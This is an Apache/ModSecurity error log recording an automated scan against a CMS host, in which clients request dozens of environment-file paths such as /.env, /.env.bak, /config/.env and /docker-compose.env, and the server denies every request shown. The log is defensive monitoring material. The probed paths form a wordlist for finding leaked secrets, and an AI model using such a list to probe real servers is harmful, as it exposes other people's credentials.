[:error] [pid 14299:tid 14349] [client 172.70.251.147:12155] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.dev"] [unique_id "abze24gHLbuvz2RS3ZspWwAAAEw"] [Fri Mar 20 07:44:59.967918 2026] [:error] [pid 17713:tid 17809] [client 172.70.250.214:14234] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.test"] [unique_id "abze2-WNdVzdR4d4e6YXvAAAARM"] [Fri Mar 20 07:44:59.976604 2026] [:error] [pid 17713:tid 17799] [client 172.70.250.215:11573] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.staging"] [unique_id "abze2-WNdVzdR4d4e6YXvQAAAQk"] [Fri Mar 20 07:44:59.976857 2026] [:error] [pid 17713:tid 17807] [client 172.70.251.103:10629] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.backup"] [unique_id "abze2-WNdVzdR4d4e6YXvgAAARE"] [Fri Mar 20 07:44:59.978020 2026] [:error] [pid 17713:tid 17793] [client 172.70.250.214:14229] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.bak"] [unique_id "abze2-WNdVzdR4d4e6YXvwAAAQM"] [Fri Mar 20 07:44:59.978619 2026] [:error] [pid 14299:tid 14359] [client 172.70.251.147:12155] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.old"] [unique_id "abze24gHLbuvz2RS3ZspXAAAAFE"] [Fri Mar 20 07:44:59.979167 2026] [:error] [pid 17713:tid 17798] [client 172.70.251.104:10165] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.save"] [unique_id "abze2-WNdVzdR4d4e6YXwAAAAQg"] [Fri Mar 20 07:44:59.988454 2026] [:error] [pid 17713:tid 17811] [client 172.70.250.214:14234] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.tmp"] [unique_id "abze2-WNdVzdR4d4e6YXwQAAARU"] [Fri Mar 20 07:44:59.989062 2026] [:error] [pid 14299:tid 14347] [client 172.70.251.147:12155] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.example"] [unique_id "abze24gHLbuvz2RS3ZspXQAAAEs"] [Fri Mar 20 07:44:59.989835 2026] [:error] [pid 17713:tid 17800] [client 172.70.250.215:11573] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.production.local"] [unique_id "abze2-WNdVzdR4d4e6YXwgAAAQo"] [Fri Mar 20 07:44:59.990123 2026] [:error] [pid 17713:tid 17802] [client 172.70.250.214:14229] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.development.local"] [unique_id "abze2-WNdVzdR4d4e6YXwwAAAQw"] [Fri Mar 20 07:44:59.990978 2026] [:error] [pid 17713:tid 17795] [client 172.70.251.103:10629] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/config/.env"] [unique_id "abze2-WNdVzdR4d4e6YXxAAAAQU"] [Fri Mar 20 07:44:59.998182 2026] [:error] [pid 14300:tid 14379] [client 172.70.251.103:10635] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env"] [unique_id "abze27R4r1NodKcenf6pcwAAAJY"] [Fri Mar 20 07:45:00.000332 2026] [:error] [pid 14299:tid 14372] [client 172.70.251.147:12155] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/app/.env"] [unique_id "abze3IgHLbuvz2RS3ZspXgAAAFc"] [Fri Mar 20 07:45:00.000639 2026] [:error] [pid 17713:tid 17813] [client 172.70.251.104:10165] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backend/.env"] [unique_id "abze3OWNdVzdR4d4e6YXxQAAARc"] [Fri Mar 20 07:45:00.001406 2026] [:error] [pid 17713:tid 17803] [client 172.70.250.214:14234] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/admin/.env"] [unique_id "abze3OWNdVzdR4d4e6YXxwAAAQ0"] [Fri Mar 20 07:45:00.001406 2026] [:error] [pid 17713:tid 17805] [client 172.70.251.103:10629] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/api/.env"] [unique_id "abze3OWNdVzdR4d4e6YXxgAAAQ8"] [Fri Mar 20 07:45:00.010323 2026] [:error] [pid 17713:tid 17792] [client 172.70.250.215:11573] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/public/.env"] [unique_id "abze3OWNdVzdR4d4e6YXyAAAAQI"] [Fri Mar 20 07:45:00.012428 2026] [:error] [pid 17713:tid 17804] [client 172.70.251.104:10165] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/config/env"] [unique_id "abze3OWNdVzdR4d4e6YXyQAAAQ4"] [Fri Mar 20 07:45:00.012429 2026] [:error] [pid 14300:tid 14367] [client 172.70.251.103:10635] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/private/.env"] [unique_id "abze3LR4r1NodKcenf6pdAAAAI8"] [Fri Mar 20 07:45:00.012928 2026] [:error] [pid 17713:tid 17796] [client 172.70.250.214:14229] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/config/.env.local"] [unique_id "abze3OWNdVzdR4d4e6YXygAAAQY"] [Fri Mar 20 07:45:00.013416 2026] [:error] [pid 14299:tid 14330] [client 172.70.251.147:12155] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.php"] [unique_id "abze3IgHLbuvz2RS3ZspXwAAAEA"] [Fri Mar 20 07:45:00.022086 2026] [:error] [pid 17713:tid 17814] [client 172.70.250.214:14234] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.json"] [unique_id "abze3OWNdVzdR4d4e6YXywAAARg"] [Fri Mar 20 07:45:00.024251 2026] [:error] [pid 17713:tid 17794] [client 172.70.250.215:11573] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env_backup"] [unique_id "abze3OWNdVzdR4d4e6YXzAAAAQQ"] [Fri Mar 20 07:45:00.024525 2026] [:error] [pid 17713:tid 17791] [client 172.70.251.103:10629] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env~"] [unique_id "abze3OWNdVzdR4d4e6YXzQAAAQE"] [Fri Mar 20 07:45:00.024679 2026] [:error] [pid 17713:tid 17806] [client 172.70.251.104:10165] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env2"] [unique_id "abze3OWNdVzdR4d4e6YXzgAAARA"] [Fri Mar 20 07:45:00.024775 2026] [:error] [pid 14300:tid 14339] [client 172.70.251.103:10635] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env1"] [unique_id "abze3LR4r1NodKcenf6pdQAAAIA"] [Fri Mar 20 07:45:00.033396 2026] [:error] [pid 14299:tid 14338] [client 172.70.251.147:12155] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.dist"] [unique_id "abze3IgHLbuvz2RS3ZspYAAAAEc"] [Fri Mar 20 07:45:00.035479 2026] [:error] [pid 17713:tid 17810] [client 172.70.251.104:10165] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.envrc"] [unique_id "abze3OWNdVzdR4d4e6YXzwAAARQ"] [Fri Mar 20 07:45:00.039839 2026] [access_compat:error] [pid 17713:tid 17808] [client 172.70.251.103:10641] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Fri Mar 20 07:45:00.041218 2026] [:error] [pid 17713:tid 17809] [client 172.70.250.214:14229] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.orig"] [unique_id "abze3OWNdVzdR4d4e6YX0gAAARM"] [Fri Mar 20 07:45:00.041716 2026] [:error] [pid 17713:tid 17799] [client 172.70.251.103:10629] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.production.bak"] [unique_id "abze3OWNdVzdR4d4e6YX0wAAAQk"] [Fri Mar 20 07:45:00.042077 2026] [:error] [pid 14300:tid 14366] [client 172.70.251.103:10635] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.prod"] [unique_id "abze3LR4r1NodKcenf6pdgAAAI4"] [Fri Mar 20 07:45:00.044868 2026] [:error] [pid 17713:tid 17807] [client 172.70.250.214:14234] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.dev.local"] [unique_id "abze3OWNdVzdR4d4e6YX1AAAARE"] [Fri Mar 20 07:45:00.046836 2026] [:error] [pid 17713:tid 17793] [client 172.70.251.104:10165] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.docker"] [unique_id "abze3OWNdVzdR4d4e6YX1QAAAQM"] [Fri Mar 20 07:45:00.051904 2026] [:error] [pid 14299:tid 14335] [client 172.70.251.147:12155] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.container"] [unique_id "abze3IgHLbuvz2RS3ZspYQAAAEQ"] [Fri Mar 20 07:45:00.053563 2026] [:error] [pid 17713:tid 17798] [client 172.70.250.215:11573] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/docker-compose.env"] [unique_id "abze3OWNdVzdR4d4e6YX1gAAAQg"] [Fri Mar 20 07:45:00.054027 2026] [:error] [pid 17713:tid 17811] [client 172.70.251.103:10641] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/docker/.env.local"] [unique_id "abze3OWNdVzdR4d4e6YX1wAAARU"] [Fri Mar 20 07:45:00.058071 2026] [:error] [pid 17713:tid 17802] [client 172.70.250.214:14229] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/srv/.env"] [unique_id "abze3OWNdVzdR4d4e6YX2AAAAQw"] [Fri Mar 20 07:45:00.063531 2026] [:error] [pid 17713:tid 17795] [client 172.70.250.214:14234] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/web/.env"] [unique_id "abze3OWNdVzdR4d4e6YX2QAAAQU"] [Fri Mar 20 07:45:00.064957 2026] [:error] [pid 17713:tid 17801] [client 172.70.250.215:11573] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/site/.env"] [unique_id "abze3OWNdVzdR4d4e6YX2gAAAQs"] [Fri Mar 20 07:45:00.065801 2026] [:error] [pid 17713:tid 17813] [client 172.70.251.103:10629] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/www/.env"] [unique_id "abze3OWNdVzdR4d4e6YX2wAAARc"] [Fri Mar 20 07:45:00.069953 2026] [:error] [pid 14300:tid 